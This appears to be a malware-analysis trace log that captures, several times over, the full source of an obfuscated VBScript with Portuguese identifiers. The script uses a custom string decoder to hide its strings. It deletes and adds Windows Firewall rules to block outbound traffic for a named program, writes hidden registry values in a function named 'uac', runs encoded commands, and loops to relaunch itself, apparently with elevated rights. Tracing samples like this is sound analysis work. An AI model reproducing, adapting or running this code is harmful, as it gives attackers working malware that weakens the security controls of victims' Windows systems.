bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.282] wcsncmp (_String1="m sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.282] wcsncmp (_String1=" sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.282] wcsncmp (_String1="sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.282] wcsncmp (_String1="dfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 